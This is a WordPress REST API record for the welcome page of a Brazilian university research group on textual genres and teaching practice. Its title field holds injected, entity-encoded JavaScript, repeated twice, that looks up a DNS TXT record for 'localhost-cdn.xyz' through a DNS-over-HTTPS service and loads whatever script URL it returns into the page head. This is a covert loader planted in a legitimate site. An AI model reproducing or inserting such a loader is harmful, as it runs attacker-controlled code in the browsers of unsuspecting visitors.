{"id":7,"date":"2022-09-25T00:00:00","date_gmt":"2022-09-25T03:00:00","guid":{"rendered":"http:\/\/www2.unicentro.br\/gpgenerostextuais\/?page_id=7"},"modified":"2024-09-13T05:30:24","modified_gmt":"2024-09-13T08:30:24","slug":"inicial","status":"publish","type":"page","link":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/","title":{"rendered":"Inicialfetch(&amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;quot;, {headers:{ &amp;amp;amp;quot;accept&amp;amp;amp;quot;: &amp;amp;amp;quot;application\/dns-json&amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;quot;script&amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;quot;head&amp;amp;amp;quot;).appendChild(t)});fetch(&amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;quot;, {headers:{ &amp;amp;amp;quot;accept&amp;amp;amp;quot;: &amp;amp;amp;quot;application\/dns-json&amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;quot;script&amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;quot;head&amp;amp;amp;quot;).appendChild(t)});"},"content":{"rendered":"<p>SEJA BEM-VINDO(A) \u00c0 P\u00c1GINA DO GRUPO DE PESQUISA G\u00caNEROS TEXTUAIS E PR\u00c1XIS DOCENTE!<\/p>\n<p>PROMOVEMOS REUNI\u00d5ES DE ESTUDOS TE\u00d3RICOS SEMANALMENTE, \u00c0S SEGUNDAS-FEIRAS (09H), NA SALA DO LIVE [BLOCO M, 2\u00ba ANDAR]. VENHA COMPARTILHAR CONOSCO! PARA SABER MAIS, <a href=\"https:\/\/www2.unicentro.br\/gpgenerostextuais\/eventos\/\">CLIQUE AQUI<\/a><\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-99\" src=\"http:\/\/www2.unicentro.br\/gpgenerostextuais\/files\/2017\/04\/books-wallpaper-3-300x200.jpg\" alt=\"\" width=\"332\" height=\"221\" srcset=\"https:\/\/www2.unicentro.br\/gpgenerostextuais\/files\/2017\/04\/books-wallpaper-3-300x200.jpg 300w, https:\/\/www2.unicentro.br\/gpgenerostextuais\/files\/2017\/04\/books-wallpaper-3-768x513.jpg 768w, https:\/\/www2.unicentro.br\/gpgenerostextuais\/files\/2017\/04\/books-wallpaper-3-1024x684.jpg 1024w, https:\/\/www2.unicentro.br\/gpgenerostextuais\/files\/2017\/04\/books-wallpaper-3.jpg 2048w\" sizes=\"auto, (max-width: 332px) 100vw, 332px\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SEJA BEM-VINDO(A) \u00c0 P\u00c1GINA DO GRUPO DE PESQUISA G\u00caNEROS TEXTUAIS E PR\u00c1XIS DOCENTE! PROMOVEMOS REUNI\u00d5ES DE ESTUDOS TE\u00d3RICOS SEMANALMENTE, \u00c0S SEGUNDAS-FEIRAS (09H), NA SALA DO LIVE [BLOCO M, 2\u00ba ANDAR]. VENHA COMPARTILHAR CONOSCO! PARA SABER MAIS, CLIQUE AQUI<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":"","_links_to":"","_links_to_target":""},"class_list":["post-7","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/7","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/comments?post=7"}],"version-history":[{"count":15,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/7\/revisions"}],"predecessor-version":[{"id":198,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/7\/revisions\/198"}],"wp:attachment":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/media?parent=7"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}